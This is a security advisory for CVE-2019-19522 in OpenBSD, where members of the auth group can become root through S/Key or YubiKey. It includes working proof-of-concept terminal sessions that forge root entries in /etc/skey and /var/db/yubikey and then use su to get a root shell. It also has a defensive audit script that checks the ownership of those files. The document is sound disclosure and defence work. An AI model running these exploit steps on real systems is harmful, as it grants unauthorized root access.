ASA-2019-00653 – OpenBSD: Local privilege escalation via S/Key and YubiKey


Allele Security Alert

ASA-2019-00653

Identifier(s)

ASA-2019-00653, CVE-2019-19522

Title

Local privilege escalation via S/Key and YubiKey

Vendor(s)

The OpenBSD Project

Product(s)

OpenBSD

Affected version(s)

OpenBSD versions 6.6 before errata 009
OpenBSD versions 6.5 before errata 020

Fixed version(s)

OpenBSD version 6.6 errata 009
OpenBSD version 6.5 errata 020

OpenBSD version 6.6 with the following patch applied:

009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig

OpenBSD version 6.5 with the following patch applied:

020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig

Proof of concept

Yes

Description

OpenBSD, in a non-default configuration where S/Key or YubiKey authentication is enabled, allows local users to become root by leveraging membership in the auth group. This occurs because an S/Key or YubiKey entry for root can be written to /etc/skey or /var/db/yubikey by any member of that group, and the entry need not be owned by root.

Technical details

If the S/Key or YubiKey authentication type is enabled (they are both installed by default but disabled), then a local attacker can exploit the privileges of the group “auth” to obtain the full privileges of the user “root” (because login_skey and login_yubikey do not verify that the files in /etc/skey and /var/db/yubikey belong to the correct user, and these directories are both writable by the group “auth”).

(Note: to obtain the privileges of the group “auth”, a local attacker can first exploit ASA-2019-00651 / CVE-2019-19520 in xlock.)

If S/Key is enabled (via skeyinit -E), a local attacker with “auth” privileges can add an S/Key entry (a file in /etc/skey) for the user “root” (if this file already exists, the attacker cannot simply remove or rename it, because /etc/skey is sticky; a simple workaround exists, and is left as an exercise for the interested reader):

------------------------------------------------------------------------------
$ id
uid=32767(nobody) gid=11(auth) groups=32767(nobody)

$ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root

$ chmod 0600 /etc/skey/root

$ env -i TERM=vt220 su -l -a skey
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN

# id
uid=0(root) gid=0(wheel) ...
------------------------------------------------------------------------------

If YubiKey is enabled (via login.conf), a local attacker with “auth” privileges can add a YubiKey entry (two files in /var/db/yubikey) for the user “root” (if these files already exist, the attacker can simply remove or rename them, because /var/db/yubikey is not sticky):

------------------------------------------------------------------------------
$ id
uid=32767(nobody) gid=11(auth) groups=32767(nobody)

$ echo 32d32ddfb7d5 > /var/db/yubikey/root.uid

$ echo 554d5eedfd75fb96cc74d52609505216 > /var/db/yubikey/root.key

$ env -i TERM=vt220 su -l -a yubikey
Password: krkhgtuhdnjclrikikklulkldlutreul

# id
uid=0(root) gid=0(wheel) ...
------------------------------------------------------------------------------
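A defender-side check for the root cause described above (login_skey and login_yubikey accepting an entry without verifying that it belongs to the named user), added here as an example and not taken from the advisory or from OpenBSD: it lists every entry in /etc/skey and /var/db/yubikey whose owner does not match the user the file name denotes, which is exactly the condition the errata make the login programs refuse. The directory paths are the ones named in the advisory; the function names and the `ls`/`awk` owner parsing are my own assumptions.

```shell
#!/bin/sh
# Audit S/Key and YubiKey credential directories for entries whose owner
# does not match the user named by the file. Constructed example; the
# directory paths are the ones named in the advisory.

# audit_dir DIR: print one line per mismatching entry, return 0 if the
# directory is clean (or absent) and 1 if any entry is mis-owned.
audit_dir() {
    dir=$1
    rc=0
    [ -d "$dir" ] || return 0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        base=${f##*/}
        # YubiKey entries are <user>.uid and <user>.key; S/Key entries
        # are just <user>, so derive the expected owner from the name.
        case "$base" in
            *.uid|*.key) user=${base%.*} ;;
            *)           user=$base ;;
        esac
        # Third field of "ls -l" is the owner on both OpenBSD and Linux;
        # a numeric value appears there when the uid has no passwd entry.
        owner=$(ls -ld "$f" | awk '{print $3}')
        if [ "$owner" != "$user" ]; then
            printf '%s owned by %s, expected %s\n' "$f" "$owner" "$user"
            rc=1
        fi
    done
    return $rc
}

# audit_all: run the check over both directories the advisory names.
audit_all() {
    status=0
    for d in /etc/skey /var/db/yubikey; do
        audit_dir "$d" || status=1
    done
    return $status
}
```

A non-zero exit from `audit_all` means some entry would have been accepted for a user other than its owner before the errata, and is worth investigating on any host that runs unpatched login_skey or login_yubikey.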

Credits

Qualys Research Team

Reference(s)

OpenBSD 6.6 Errata
https://www.openbsd.org/errata66.html

OpenBSD 6.5 Errata
https://www.openbsd.org/errata65.html

009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig

020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig

Constrain honouring of path-related environment variables based upon
https://github.com/openbsd/xenocara/commit/5886ab525a096cb2504f9e3ce1cd4fd79fb1e414

Full Disclosure: Authentication vulnerabilities in OpenBSD
https://seclists.org/fulldisclosure/2019/Dec/14

oss-security – Authentication vulnerabilities in OpenBSD
https://www.openwall.com/lists/oss-security/2019/12/04/5

Bugtraq: Authentication vulnerabilities in OpenBSD
https://seclists.org/bugtraq/2019/Dec/8

ASA-2019-00651 – OpenBSD: Local privilege escalation via xlock
https://allelesecurity.com/ASA-2019-00651/

CVE-2019-19520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19520

CVE-2019-19520
https://nvd.nist.gov/vuln/detail/CVE-2019-19520

CVE-2019-19522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19522

CVE-2019-19522
https://nvd.nist.gov/vuln/detail/CVE-2019-19522

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: February 11, 2020

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.